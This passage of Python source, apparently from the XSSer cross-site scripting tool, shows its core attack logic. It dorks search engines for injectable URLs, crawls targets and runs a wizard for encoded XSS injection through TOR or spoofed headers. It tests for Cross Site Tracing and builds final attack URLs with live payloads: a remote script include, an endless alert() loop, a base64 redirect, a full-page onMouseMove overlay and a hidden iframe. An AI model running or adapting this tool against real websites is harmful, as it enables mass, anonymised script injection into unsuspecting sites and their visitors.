  2016. dorks = [ dork.replace('\n','') for dork in dorks ]
  2017. f.close()
  2018. if not dorks:
  2019. print("\n[Error] - Imposible to retrieve 'dorks' from file.\n")
  2020. return
  2021. except:
  2022. if os.path.exists('core/fuzzing/dorks.txt') == True:
  2023. print('[Error] - Cannot open:', 'dorks.txt', "\n")
  2024. return
  2025. else:
  2026. print('[Error] - Cannot found:', 'dorks.txt', "\n")
  2027. return
  2028. if not options.dork_engine:
  2029. options.dork_engine = 'duck' # default search engine [26-08/2019]
  2030. if options.dork_mass: # massive dorkering
  2031. for e in self.search_engines:
  2032. try:
  2033. dorker = Dorker(e)
  2034. for dork in dorks:
  2035. urls = dorker.dork(dork)
  2036. i = 0
  2037. for u in urls: # replace original parameter for injection keyword (XSS)
  2038. p_uri = urlparse(u)
  2039. uri = p_uri.netloc
  2040. path = p_uri.path
  2041. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2042. for key, value in target_params.items(): # parse params to apply keywords
  2043. for v in value:
  2044. target_params[key] = 'XSS'
  2045. target_url_params = urllib.parse.urlencode(target_params)
  2046. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2047. urls[i] = u
  2048. i = i + 1
  2049. except Exception as e:
  2050. for reporter in self._reporters:
  2051. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2052. else:
  2053. if urls is not None:
  2054. for url in urls:
  2055. for reporter in self._reporters:
  2056. reporter.add_link(dorker.search_url, url)
  2057. else:
  2058. dorker = Dorker(options.dork_engine)
  2059. try:
  2060. for dork in dorks:
  2061. urls = dorker.dork(dork)
  2062. i = 0
  2063. for u in urls: # replace original parameter for injection keyword (XSS)
  2064. p_uri = urlparse(u)
  2065. uri = p_uri.netloc
  2066. path = p_uri.path
  2067. target_params = parse_qs(urlparse(u).query, keep_blank_values=True)
  2068. for key, value in target_params.items(): # parse params to apply keywords
  2069. for v in value:
  2070. target_params[key] = 'XSS'
  2071. target_url_params = urllib.parse.urlencode(target_params)
  2072. u = p_uri.scheme + "://" + uri + path + "?" + target_url_params
  2073. urls[i] = u
  2074. i = i + 1
  2075. except Exception as e:
  2076. for reporter in self._reporters:
  2077. reporter.mosquito_crashed(dorker.search_url, str(e.message))
  2078. else:
  2079. if urls is not None:
  2080. for url in urls:
  2081. for reporter in self._reporters:
  2082. reporter.add_link(dorker.search_url, url)
  2083. if options.crawling: # crawlering target(s)
  2084. nthreads = options.threads
  2085. self.crawled_urls = list(urls)
  2086. all_crawled = []
  2087. try:
  2088. self.options.crawling = int(self.options.crawling)
  2089. except:
  2090. self.options.crawling = 50
  2091. if self.options.crawler_width == None:
  2092. self.options.crawler_width = 2 # default crawlering-width
  2093. else:
  2094. try:
  2095. self.options.crawler_width = int(self.options.crawler_width)
  2096. except:
  2097. self.options.crawler_width = 2 # default crawlering-width
  2098. if self.options.crawler_local == None:
  2099. self.options.crawler_local = False # default crawlering to LOCAL
  2100. for url in set(urls):
  2101. self.report("\n[Info] Crawlering TARGET:", url, "\n\n - Max. limit: "+ str(self.options.crawling)+ " \n - Deep level: "+ str(options.crawler_width))
  2102. crawler = Crawler(self, Curl, all_crawled,
  2103. self.pool)
  2104. crawler.set_reporter(self)
  2105. # now wait for all results to arrive
  2106. while urls:
  2107. self.run_crawl(crawler, urls.pop(), options)
  2108. while not self._landing:
  2109. for reporter in self._reporters:
  2110. reporter.report_state('broad scanning')
  2111. try:
  2112. self.pool.poll()
  2113. except NoResultsPending:
  2114. crawler.cancel()
  2115. break
  2116. if len(self.crawled_urls) >= int(options.crawling) or not crawler._requests:
  2117. self.report("\n[Info] Found enough results... calling all mosquitoes to home!")
  2118. crawler.cancel()
  2119. break
  2120. time.sleep(0.1)
  2121. # re-parse crawled urls from main
  2122. parsed_crawled_urls = []
  2123. for u in self.crawled_urls:
  2124. if "XSS" in u:
  2125. parsed_crawled_urls.append(u)
  2126. else:
  2127. pass
  2128. self.crawled_urls = parsed_crawled_urls
  2129. # report parsed crawled urls
  2130. self.report("\n" + "-"*25)
  2131. self.report("\n[Info] Mosquitoes have found: [ " + str(len(self.crawled_urls)) + " ] possible attacking vector(s)")
  2132. if self.options.verbose:
  2133. self.report("")
  2134. for u in self.crawled_urls:
  2135. if '/XSS' in u:
  2136. u = u.replace("/XSS", "")
  2137. print(" - " + str(u))
  2138. if len(self.crawled_urls) > 0:
  2139. self.report("")
  2140. else:
  2141. self.report("-"*25)
  2142. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
  2143. return self.crawled_urls
  2144. if not options.imx or not options.flash or not options.xsser_gtk or not options.update:
  2145. return urls
  2146. def run_crawl(self, crawler, url, options):
  2147. def _cb(request, result):
  2148. pass
  2149. def _error_cb(request, error):
  2150. for reporter in self._reporters:
  2151. reporter.mosquito_crashed(url, str(error[0]))
  2152. traceback.print_tb(error[2])
  2153. def crawler_main(args):
  2154. return crawler.crawl(*args)
  2155. crawler.crawl(url, int(options.crawler_width),
  2156. int(options.crawling),options.crawler_local)
  2157. def poll_workers(self):
  2158. try:
  2159. self.pool.poll()
  2160. except NoResultsPending:
  2161. pass
  2162. def try_running(self, func, error, args=[]):
  2163. """
  2164. Try running a function and print some error if it fails and exists with
  2165. a fatal error.
  2166. """
  2167. try:
  2168. return func(*args)
  2169. except Exception as e:
  2170. self.report(error)
  2171. if DEBUG:
  2172. traceback.print_exc()
  2173. def check_trace(self):
  2174. """
  2175. Check for Cross Site Tracing (XST) vulnerability:
  2176. 1) check HTTP TRACE method enabled (add 'Max-Forwards: 0' to curl command to bypass some 'Anti-antixst' web proxy rules)
  2177. 2) check data sent on reply
  2178. """
  2179. agents = [] # user-agents
  2180. try:
  2181. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2182. except:
  2183. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2184. for line in f:
  2185. agents.append(line)
  2186. agent = random.choice(agents).strip() # set random user-agent
  2187. referer = '127.0.0.1'
  2188. import subprocess, shlex
  2189. self.report('='*75)
  2190. self.report("\n[Info] Trying method: Cross Site Tracing (XST)\n")
  2191. if self.options.xst:
  2192. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.xst), stdout=subprocess.PIPE)
  2193. if self.options.target:
  2194. xst = subprocess.Popen(shlex.split('curl -q -s -i -m 30 -A ' + agent + ' -e ' + referer + ' -X TRACE ' + self.options.target), stdout=subprocess.PIPE)
  2195. line1 = xst.stdout.readline()
  2196. if self.options.verbose:
  2197. print("-"*25 + "\n")
  2198. while True:
  2199. line = xst.stdout.readline()
  2200. if line != '':
  2201. print(line.rstrip())
  2202. else:
  2203. break
  2204. self.report("")
  2205. self.report('-'*50+"\n")
  2206. if "200 OK" in line1.rstrip():
  2207. print("[Info] Target is vulnerable to XST! (Cross Site Tracing) ;-)\n")
  2208. else:
  2209. print("[Info] Target is NOT vulnerable to XST (Cross Site Tracing) ;-(\n")
  2210. if self.options.target:
  2211. self.report('='*75)
  2212. def start_wizard(self):
  2213. """
  2214. Start Wizard Helper
  2215. """
  2216. #step 0: Menu
  2217. ans1=True
  2218. ans2=True
  2219. ans3=True
  2220. ans4=True
  2221. ans5=True
  2222. ans6=True
  2223. #step 1: Where
  2224. while ans1:
  2225. print("""\nA)- Where are your targets?\n
  2226. [1]- I want to enter the url of my target directly.
  2227. [2]- I want to enter a list of targets from a .txt file.
  2228. *[3]- I don't know where are my target(s)... I just want to explore! :-)
  2229. [e]- Exit/Quit/Abort.
  2230. """)
  2231. ans1 = input("Your choice: [1], [2], [3] or [e]xit\n")
  2232. if ans1 == "1": # from url
  2233. url = input("Target url (ex: http(s)://target.com): ")
  2234. if url.startswith("http"):
  2235. ans1 = None
  2236. else:
  2237. print("\n[Error] Your url is not valid!. Try again!")
  2238. pass
  2239. elif ans1 == "2": # from file
  2240. url = input("Path to file (ex: 'targets_list.txt'): ")
  2241. if url == None:
  2242. print("\n[Error] Your are not providing a valid file. Try again!")
  2243. pass
  2244. else:
  2245. ans1 = None
  2246. elif ans1 == "3": # dorking
  2247. url = "DORKING"
  2248. ans1 = None
  2249. elif (ans1 == "e" or ans1 == "E"):
  2250. print("Closing wizard...")
  2251. ans1=None
  2252. ans2=None
  2253. ans3=None
  2254. ans4=None
  2255. ans5=None
  2256. ans6=None
  2257. else:
  2258. print("\nNot valid choice. Try again!")
  2259. #step 2: How
  2260. while ans2:
  2261. print(22*"-")
  2262. print("""\nB)- How do you want to connect?\n
  2263. [1]- I want to connect using GET and select some possible vulnerable parameter(s) directly.
  2264. [2]- I want to connect using POST and select some possible vulnerable parameter(s) directly.
  2265. [3]- I want to "crawl" all the links of my target(s) to found as much vulnerabilities as possible.
  2266. *[4]- I don't know how to connect... Just do it! :-)
  2267. [e]- Exit/Quit/Abort.
  2268. """)
  2269. ans2 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2270. if ans2 == "1": # using GET
  2271. payload = input("GET payload (ex: '/menu.php?q='): ")
  2272. if payload == None:
  2273. print("\n[Error] Your are providing an empty payload. Try again!")
  2274. pass
  2275. else:
  2276. self.user_template_conntype = "GET"
  2277. ans2 = None
  2278. elif ans2 == "2": # using POST
  2279. payload = input("POST payload (ex: 'foo=1&bar='): ")
  2280. if payload == None:
  2281. print("\n[Error] Your are providing an empty payload. Try again!")
  2282. pass
  2283. else:
  2284. self.user_template_conntype = "POST"
  2285. ans2 = None
  2286. elif ans2 == "3": # crawlering
  2287. payload = "CRAWLER"
  2288. ans2 = None
  2289. elif ans2 == "4": # crawlering
  2290. payload = "CRAWLER"
  2291. ans2 = None
  2292. elif (ans2 == "e" or ans2 == "E"):
  2293. print("Closing wizard...")
  2294. ans2=None
  2295. ans3=None
  2296. ans4=None
  2297. ans5=None
  2298. ans6=None
  2299. else:
  2300. print("\nNot valid choice. Try again!")
  2301. #step 3: Proxy
  2302. while ans3:
  2303. print(22*"-")
  2304. print("""\nC)- Do you want to be 'anonymous'?\n
  2305. [1]- Yes. I want to use my proxy and apply automatic spoofing methods.
  2306. [2]- Anonymous?. Yes!!!. I have a TOR proxy ready at: http://127.0.0.1:8118.
  2307. *[3]- Yes. But I haven't any proxy. :-)
  2308. [4]- No. It's not a problem for me to connect directly to the target(s).
  2309. [e]- Exit/Quit.
  2310. """)
  2311. ans3 = input("Your choice: [1], [2], [3], [4] or [e]xit\n")
  2312. if ans3 == "1": # using PROXY + spoofing
  2313. proxy = input("Enter proxy [http(s)://server:port]: ")
  2314. ans3 = None
  2315. elif ans3 == "2": # using TOR + spoofing
  2316. proxy = 'Using TOR (default: http://127.0.0.1:8118)'
  2317. proxy = 'http://127.0.0.1:8118'
  2318. ans3 = None
  2319. elif ans3 == "3": # only spoofing
  2320. proxy = 'Proxy: No - Spoofing: Yes'
  2321. ans3 = None
  2322. elif ans3 == "4": # no spoofing
  2323. proxy = 'Proxy: No - Spoofing: No'
  2324. ans3 = None
  2325. elif (ans3 == "e" or ans3 == "E"):
  2326. print("Closing wizard...")
  2327. ans3=None
  2328. ans4=None
  2329. ans5=None
  2330. ans6=None
  2331. else:
  2332. print("\nNot valid choice. Try again!")
  2333. #step 4: Bypasser(s)
  2334. while ans4:
  2335. print(22*"-")
  2336. print("""\nD)- Which 'bypasser(s' do you want to use?\n
  2337. [1]- I want to inject XSS scripts without any encoding.
  2338. [2]- Try to inject code using 'Hexadecimal'.
  2339. [3]- Try to inject code mixing 'String.FromCharCode()' and 'Unescape()'.
  2340. [4]- I want to inject using 'Character Encoding Mutations' (Une+Str+Hex).
  2341. *[5]- I don't know exactly what is a 'bypasser'... But I want to inject code! :-)
  2342. [e]- Exit/Quit.
  2343. """)
  2344. ans4 = input("Your choice: [1], [2], [3], [4], [5] or [e]xit\n")
  2345. if ans4 == "1": # no encode
  2346. enc = "Not using encoders"
  2347. ans4 = None
  2348. elif ans4 == "2": # enc: Hex
  2349. enc = 'Hex'
  2350. ans4 = None
  2351. elif ans4 == "3": # enc: Str+Une
  2352. enc = 'Str+Une'
  2353. ans4 = None
  2354. elif ans4 == "4": # enc: Mix: Une+Str+Hex
  2355. enc = "Une,Str,Hex"
  2356. ans4 = None
  2357. elif ans4 == "5": # enc: no encode
  2358. enc = 'Not using encoders'
  2359. ans4 = None
  2360. elif (ans4 == "e" or ans4 == "E"):
  2361. print("Closing wizard...")
  2362. ans4=None
  2363. ans5=None
  2364. ans6=None
  2365. else:
  2366. print("\nNot valid choice. Try again!")
  2367. #step 5: Exploiting
  2368. while ans5:
  2369. print(22*"-")
  2370. print("""\nE)- Which final code do you want to 'exploit' on vulnerabilities found?\n
  2371. [1]- I want to inject a classic "Alert" message box.
  2372. [2]- I want to inject my own scripts.
  2373. *[3]- I don't want to inject a final code... I just want to discover vulnerabilities! :-)
  2374. [e]- Exit/Quit.
  2375. """)
  2376. ans5 = input("Your choice: [1], [2], [3] or [e]xit\n")
  2377. if ans5 == "1": # alertbox
  2378. script = 'Alertbox'
  2379. ans5 = None
  2380. elif ans5 == "2": # manual
  2381. script = input("Enter code (ex: '><script>alert('XSS');</script>): ")
  2382. if script == None:
  2383. print("\n[Error] Your are providing an empty script to inject. Try again!")
  2384. pass
  2385. else:
  2386. ans5 = None
  2387. elif ans5 == "3": # no exploit
  2388. script = 'Not exploiting code'
  2389. ans5 = None
  2390. elif (ans5 == "e" or ans5 == "E"):
  2391. print("Closing wizard...")
  2392. ans5=None
  2393. ans6=None
  2394. else:
  2395. print("\nNot valid choice. Try again!")
  2396. #step 6: Final
  2397. while ans6:
  2398. print(22*"-")
  2399. print("\nVery nice!. That's all. Your last step is to -accept or not- this template.\n")
  2400. print("A)- Target:", url)
  2401. print("B)- Payload:", payload)
  2402. print("C)- Privacy:", proxy)
  2403. print("D)- Bypasser(s):", enc)
  2404. print("E)- Final:", script)
  2405. print("""
  2406. [Y]- Yes. Accept it and start testing!.
  2407. [N]- No. Abort it?.
  2408. """)
  2409. ans6 = input("Your choice: [Y] or [N]\n")
  2410. if (ans6 == "y" or ans6 == "Y"): # YES
  2411. start = 'YES'
  2412. print('Good fly... and happy "Cross" hacking !!! :-)\n')
  2413. ans6 = None
  2414. elif (ans6 == "n" or ans6 == "N"): # NO
  2415. start = 'NO'
  2416. print("Aborted!. Closing wizard...")
  2417. ans6 = None
  2418. else:
  2419. print("\nNot valid choice. Try again!")
  2420. if url and payload and proxy and enc and script:
  2421. return url, payload, proxy, enc, script
  2422. else:
  2423. return
  2424. def create_fake_image(self, filename, payload):
  2425. """
  2426. Create -fake- image with code injected
  2427. """
  2428. options = self.options
  2429. filename = options.imx
  2430. payload = options.script
  2431. image_xss_injections = ImageInjections()
  2432. image_injections = image_xss_injections.image_xss(options.imx , options.script)
  2433. return image_injections
  2434. def create_fake_flash(self, filename, payload):
  2435. """
  2436. Create -fake- flash movie (.swf) with code injected
  2437. """
  2438. options = self.options
  2439. filename = options.flash
  2440. payload = options.script
  2441. flash_xss_injections = FlashInjections()
  2442. flash_injections = flash_xss_injections.flash_xss(options.flash, options.script)
  2443. return flash_injections
  2444. def create_gtk_interface(self):
  2445. """
  2446. Create GTK Interface
  2447. """
  2448. options = self.options
  2449. from core.gtkcontroller import Controller, reactor
  2450. uifile = "xsser.ui"
  2451. controller = Controller(uifile, self)
  2452. self._reporters.append(controller)
  2453. if reactor:
  2454. reactor.run()
  2455. else:
  2456. from gi.repository import Gtk
  2457. Gtk.main()
  2458. return controller
  2459. def run(self, opts=None):
  2460. """
  2461. Run xsser.
  2462. """
  2463. #self._landing = False
  2464. for reporter in self._reporters:
  2465. reporter.start_attack()
  2466. if opts:
  2467. options = self.create_options(opts)
  2468. self.set_options(options)
  2469. if not self.mothership and not self.hub:
  2470. self.hub = HubThread(self)
  2471. self.hub.start()
  2472. options = self.options
  2473. if options:
  2474. # step -1; order attacks
  2475. if self.options.hash is True: # not fuzzing/heuristic when hash precheck
  2476. self.options.fuzz = False
  2477. self.options.script = False
  2478. self.options.coo = False
  2479. self.options.xsa = False
  2480. self.options.xsr = False
  2481. self.options.dcp = False
  2482. self.options.dom = False
  2483. self.options.inducedcode = False
  2484. self.options.heuristic = False
  2485. if self.options.heuristic: # not fuzzing/hash when heuristic precheck
  2486. self.options.fuzz = False
  2487. self.options.script = False
  2488. self.options.coo = False
  2489. self.options.xsa = False
  2490. self.options.xsr = False
  2491. self.options.dcp = False
  2492. self.options.dom = False
  2493. self.options.inducedcode = False
  2494. self.options.hash = False
  2495. if self.options.Cem: # parse input at CEM for blank spaces
  2496. self.options.Cem = self.options.Cem.replace(" ","")
  2497. else:
  2498. pass
  2499. # step 0: third party tricks
  2500. try:
  2501. if self.options.imx: # create -fake- image with code injected
  2502. p = self.optionParser
  2503. self.report('='*75)
  2504. self.report(str(p.version))
  2505. self.report('='*75)
  2506. self.report("[Image XSS Builder]...")
  2507. self.report('='*75)
  2508. self.report(''.join(self.create_fake_image(self.options.imx, self.options.script)))
  2509. self.report('='*75 + "\n")
  2510. except:
  2511. return
  2512. if options.flash: # create -fake- flash movie (.swf) with code injected
  2513. p = self.optionParser
  2514. self.report('='*75)
  2515. self.report(str(p.version))
  2516. self.report('='*75)
  2517. self.report("[Flash Attack! XSS Builder]...")
  2518. self.report('='*75)
  2519. self.report(''.join(self.create_fake_flash(self.options.flash, self.options.script)))
  2520. self.report('='*75 + "\n")
  2521. if options.xsser_gtk:
  2522. self.create_gtk_interface()
  2523. return
  2524. if self.options.wizard: # start a wizard helper
  2525. p = self.optionParser
  2526. self.report('='*75)
  2527. self.report(str(p.version))
  2528. self.report('='*75)
  2529. self.report("[Wizard] Generating XSS attack...")
  2530. self.report('='*75)
  2531. self.user_template = self.start_wizard()
  2532. if self.options.xst: # check for cross site tracing
  2533. p = self.optionParser
  2534. if not self.options.target:
  2535. self.report('='*75)
  2536. self.report(str(p.version))
  2537. self.report('='*75)
  2538. self.report("[XST Attack!] checking for HTTP TRACE method ...")
  2539. self.report('='*75)
  2540. self.check_trace()
  2541. if options.checktor:
  2542. url = self.check_tor_url # TOR status checking site
  2543. print('='*75)
  2544. print("")
  2545. print(" _ ")
  2546. print(" /_/_ .'''. ")
  2547. print(" =O(_)))) ...' `. ")
  2548. print(" \_\ `. .'''")
  2549. print(" `..' ")
  2550. print("")
  2551. print('='*75)
  2552. agents = [] # user-agents
  2553. try:
  2554. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2555. except:
  2556. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2557. for line in f:
  2558. agents.append(line)
  2559. agent = random.choice(agents).strip() # set random user-agent
  2560. referer = "127.0.0.1"
  2561. print("\nSending request to: " + url + "\n")
  2562. print("-"*25+"\n")
  2563. headers = {'User-Agent' : agent, 'Referer' : referer} # set fake user-agent and referer
  2564. try:
  2565. import urllib.request, urllib.error, urllib.parse
  2566. req = urllib.request.Request(url, None, headers)
  2567. tor_reply = urllib.request.urlopen(req).read()
  2568. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip() # extract public IP
  2569. if not tor_reply or 'Congratulations' not in tor_reply:
  2570. print("It seems that Tor is not properly set.\n")
  2571. print(("IP address appears to be: " + your_ip + "\n"))
  2572. else:
  2573. print("Congratulations!. Tor is properly being used :-)\n")
  2574. print(("IP address appears to be: " + your_ip + "\n"))
  2575. except:
  2576. print("[Error] Cannot reach TOR checker system!. Are you connected?\n")
  2577. sys.exit(2) # return
  2578. nthreads = max(1, abs(options.threads))
  2579. nworkers = len(self.pool.workers)
  2580. if nthreads != nworkers:
  2581. if nthreads < nworkers:
  2582. self.pool.dismissWorkers(nworkers-nthreads)
  2583. else:
  2584. self.pool.createWorkers(nthreads-nworkers)
  2585. for reporter in self._reporters:
  2586. reporter.report_state('scanning')
  2587. # step 1: get urls
  2588. urls = self.try_running(self._get_attack_urls, "\n[Error] Internal error getting -targets-\n")
  2589. for reporter in self._reporters:
  2590. reporter.report_state('arming')
  2591. # step 2: get payloads
  2592. payloads = self.try_running(self.get_payloads, "\n[Error] Internal error getting -payloads-\n")
  2593. for reporter in self._reporters:
  2594. reporter.report_state('cloaking')
  2595. if options.Dwo:
  2596. payloads = self.process_payloads_ipfuzzing(payloads)
  2597. elif options.Doo:
  2598. payloads = self.process_payloads_ipfuzzing_octal(payloads)
  2599. for reporter in self._reporters:
  2600. reporter.report_state('locking targets')
  2601. # step 3: get query string
  2602. query_string = self.try_running(self.get_query_string, "\n[Error] Internal problems getting query -string-\n")
  2603. for reporter in self._reporters:
  2604. reporter.report_state('sanitize')
  2605. urls = self.sanitize_urls(urls)
  2606. for reporter in self._reporters:
  2607. reporter.report_state('attack')
  2608. # step 4: perform attack
  2609. self.try_running(self.attack, "\n[Error] Internal problems running attack...\n", (urls, payloads, query_string))
  2610. for reporter in self._reporters:
  2611. reporter.report_state('reporting')
  2612. if len(self.final_attacks):
  2613. self.report("[Info] Waiting for tokens to arrive...")
  2614. while self._ongoing_requests and not self._landing:
  2615. if not self.pool:
  2616. self.mothership.poll_workers()
  2617. else:
  2618. self.poll_workers()
  2619. time.sleep(0.2)
  2620. for reporter in self._reporters:
  2621. reporter.report_state('final sweep...')
  2622. if self.pool:
  2623. self.pool.dismissWorkers(len(self.pool.workers))
  2624. self.pool.joinAllDismissedWorkers()
  2625. start = time.time()
  2626. while not self._landing and len(self.final_attacks) and time.time() - start < 5.0:
  2627. time.sleep(0.2)
  2628. for reporter in self._reporters:
  2629. reporter.report_state('landing... '+str(int(5.0 - (time.time() - start))))
  2630. if self.final_attacks:
  2631. self.report("-"*25+"\n")
  2632. self.report("[Info] Generating 'token' url:\n")
  2633. for final_attack in self.final_attacks.values():
  2634. if not final_attack['url'] == None:
  2635. self.report(final_attack['url'] , "\n")
  2636. self.report("="*50+"\n")
  2637. self.report("[Info] CONGRATULATIONS!!! <-> This vector is doing a remote connection... So, is: 100% VULNERABLE! ;-)\n")
  2638. self.report(",".join(self.successful_urls), "\n")
  2639. self.report("="*50 + "\n")
  2640. for reporter in self._reporters:
  2641. reporter.end_attack()
  2642. self.report("="*50)
  2643. if self.mothership:
  2644. self.mothership.remove_reporter(self)
  2645. self.report("Mosquito(es) landed!")
  2646. else:
  2647. self.report("Mosquito(es) landed!")
  2648. self.report("="*50)
  2649. self.print_results()
  2650. def sanitize_urls(self, urls):
  2651. all_urls = set()
  2652. if urls is not None:
  2653. for url in urls:
  2654. if url.startswith("http://") or url.startswith("https://"):
  2655. self.urlspoll.append(url)
  2656. all_urls.add(url)
  2657. else:
  2658. if self.options.crawling:
  2659. self.report("[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2660. else:
  2661. self.report("\n[Error] This target URL: (" + url + ") is not correct! [DISCARDED]\n")
  2662. url = None
  2663. else:
  2664. self.report("\n[Error] Not any valid source provided to start a test... Aborting!\n")
  2665. return all_urls
  2666. def land(self, join=False):
  2667. self._landing = True
  2668. if self.hub:
  2669. self.hub.shutdown()
  2670. if join:
  2671. self.hub.join()
  2672. self.hub = None
  2673. def _prepare_extra_attacks(self, payload):
  2674. """
  2675. Setup extra attacks.
  2676. """
  2677. options = self.options
  2678. agents = [] # user-agents
  2679. try:
  2680. f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
  2681. except:
  2682. f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing
  2683. for line in f:
  2684. agents.append(line)
  2685. extra_agent = random.choice(agents).strip() # set random user-agent
  2686. extra_referer = "127.0.0.1"
  2687. extra_cookie = None
  2688. if self.options.script:
  2689. if 'XSS' in payload['payload']:
  2690. payload['payload'] = payload['payload'].replace("XSS","PAYLOAD")
  2691. if 'PAYLOAD' in payload['payload'] or 'XSS' in payload['payload']:
  2692. if options.xsa:
  2693. hashing = self.generate_hash('xsa')
  2694. agent = payload['payload'].replace('PAYLOAD', hashing)
  2695. self._ongoing_attacks['xsa'] = hashing
  2696. self.xsa_injection = self.xsa_injection + 1
  2697. self.options.agent = agent
  2698. extra_agent = agent
  2699. self.extra_hashed_injections[hashing] = "XSA", payload['payload']
  2700. if options.xsr:
  2701. hashing = self.generate_hash('xsr')
  2702. referer = payload['payload'].replace('PAYLOAD', hashing)
  2703. self._ongoing_attacks['xsr'] = hashing
  2704. self.xsr_injection = self.xsr_injection + 1
  2705. self.options.referer = referer
  2706. extra_referer = referer
  2707. self.extra_hashed_injections[hashing] = "XSR", payload['payload']
  2708. if options.coo:
  2709. hashing = self.generate_hash('cookie')
  2710. cookie = payload['payload'].replace('PAYLOAD', hashing)
  2711. self._ongoing_attacks['coo'] = hashing
  2712. self.coo_injection = self.coo_injection + 1
  2713. self.options.cookie = cookie
  2714. extra_cookie = cookie
  2715. self.extra_hashed_injections[hashing] = "COO", payload['payload']
  2716. return extra_agent, extra_referer, extra_cookie
  2717. def attack(self, urls, payloads, query_string):
  2718. """
  2719. Perform an attack on the given urls with the provided payloads and
  2720. query_string.
  2721. """
  2722. for url in urls:
  2723. if self.pool:
  2724. self.poll_workers()
  2725. else:
  2726. self.mothership.poll_workers()
  2727. if not self._landing:
  2728. self.attack_url(url, payloads, query_string)
  2729. def generate_real_attack_url(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  2730. """
  2731. Generate a real attack url by using data from a successful test.
  2732. This method also applies DOM stealth mechanisms.
  2733. """
  2734. user_attack_payload = payload['payload']
  2735. if self.options.finalpayload:
  2736. user_attack_payload = self.options.finalpayload
  2737. elif self.options.finalremote:
  2738. user_attack_payload = '<script src="' + self.options.finalremote + '"></script>'
  2739. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Data Control Protocol Injection]":
  2740. user_attack_payload = '<a href="data:text/html;base64,' + b64encode(self.options.finalpayload) + '></a>'
  2741. elif self.options.finalpayload or self.options.finalremote and payload["browser"] == "[Induced Injection]":
  2742. user_attack_payload = self.options.finalpayload
  2743. if self.options.dos:
  2744. user_attack_payload = '<script>for(;;)alert("You were XSSed!!");</script>'
  2745. if self.options.doss:
  2746. user_attack_payload = '<meta%20http-equiv="refresh"%20content="0;">'
  2747. if self.options.b64:
  2748. user_attack_payload = '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4">'
  2749. if self.options.onm:
  2750. user_attack_payload = '"style="position:absolute;top:0;left:0;z-index:1000;width:3000px;height:3000px" onMouseMove="' + user_attack_payload
  2751. if self.options.ifr:
  2752. user_attack_payload = '<iframe src="' + user_attack_payload + '" width="0" height="0"></iframe>'
  2753. do_anchor_payload = self.options.anchor
  2754. anchor_data = None
  2755. attack_hash = None
  2756. if do_anchor_payload: # DOM Shadows!
  2757. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2758. dest_url = dest_url.replace('?', '#')
  2759. else:
  2760. dest_url, agent, referer, cookie = self.get_url_payload(orig_url, payload, query_string, user_attack_payload)
  2761. if attack_hash:
  2762. self.final_attacks[attack_hash] = {'url':dest_url}
  2763. return dest_url
  2764. def token_arrived(self, attack_hash):
  2765. if not self.mothership:
  2766. # only the mothership calls on token arriving.
  2767. self.final_attack_callback(attack_hash)
  2768. def final_attack_callback(self, attack_hash):
  2769. if attack_hash in self.final_attacks:
  2770. dest_url = self.final_attacks[attack_hash]['url']
  2771. self.report('[*] Browser check:', dest_url)
  2772. for reporter in self._reporters:
  2773. reporter.add_checked(dest_url)
  2774. if self._reporter:
  2775. from twisted.internet import reactor
  2776. reactor.callFromThread(self._reporter.post, 'SUCCESS ' + dest_url)
  2777. self.final_attacks.pop(attack_hash)
  2778. def apply_postprocessing(self, dest_url, description, method, hashing, query_string, payload, orig_url):
  2779. real_attack_url = self.generate_real_attack_url(dest_url, description, method, hashing, query_string, payload, orig_url)
  2780. #generate_shorturls = self.options.shorturls
  2781. #if generate_shorturls:
  2782. # shortener = ShortURLReservations(self.options.shorturls)
  2783. # if self.options.finalpayload or self.options.finalremote or self.options.b64 or self.options.dos:
  2784. # shorturl = shortener.process_url(real_attack_url)
  2785. # self.report("[/] Shortered URL (Final Attack):", shorturl)
  2786. # else:
  2787. # shorturl = shortener.process_url(dest_url)
  2788. # self.report("[/] Shortered URL (Injection):", shorturl)
  2789. return real_attack_url
  2790. def report(self, *args):
  2791. args = list([str(s) for s in args])
  2792. formatted = " ".join(args)
  2793. if not self.options.silent:
  2794. print(formatted)
  2795. for reporter in self._reporters:
  2796. reporter.post(formatted)
  2797. def print_results(self):
  2798. """
  2799. Print results from attack.
  2800. """
  2801. self.report('\n' + '='*75)
  2802. total_injections = len(self.hash_found) + len(self.hash_notfound)
  2803. if len(self.hash_found) + len(self.hash_notfound) == 0:
  2804. pass
  2805. elif self.options.heuristic:
  2806. pass
  2807. else:
  2808. self.report("[*] Final Results:")
  2809. self.report('='*75 + '\n')
  2810. self.report("- Injections:", total_injections)
  2811. self.report("- Failed:", len(self.hash_notfound))
  2812. self.report("- Successful:", len(self.hash_found))
  2813. try:
  2814. _accur = len(self.hash_found) * 100 / total_injections
  2815. except ZeroDivisionError:
  2816. _accur = 0
  2817. self.report("- Accur: %s %%\n" % _accur)
  2818. if not len(self.hash_found) and self.hash_notfound:
  2819. self.report('='*75 + '\n')
  2820. pass
  2821. else:
  2822. self.report('='*75)
  2823. self.report("[*] List of XSS injections:")
  2824. self.report('='*75 + '\n')
  2825. if self.options.reversecheck:
  2826. self.report("You have found: [ " + str(len(self.hash_found)) + " ] XSS vector(s)! -> [100% VULNERABLE]\n")
  2827. else:
  2828. self.report("You have found: [ " + str(len(self.hash_found)) + " ] possible (without --reverse-check) XSS vector(s)!\n")
  2829. self.report("---------------------" + "\n")
  2830. if self.options.fileoutput:
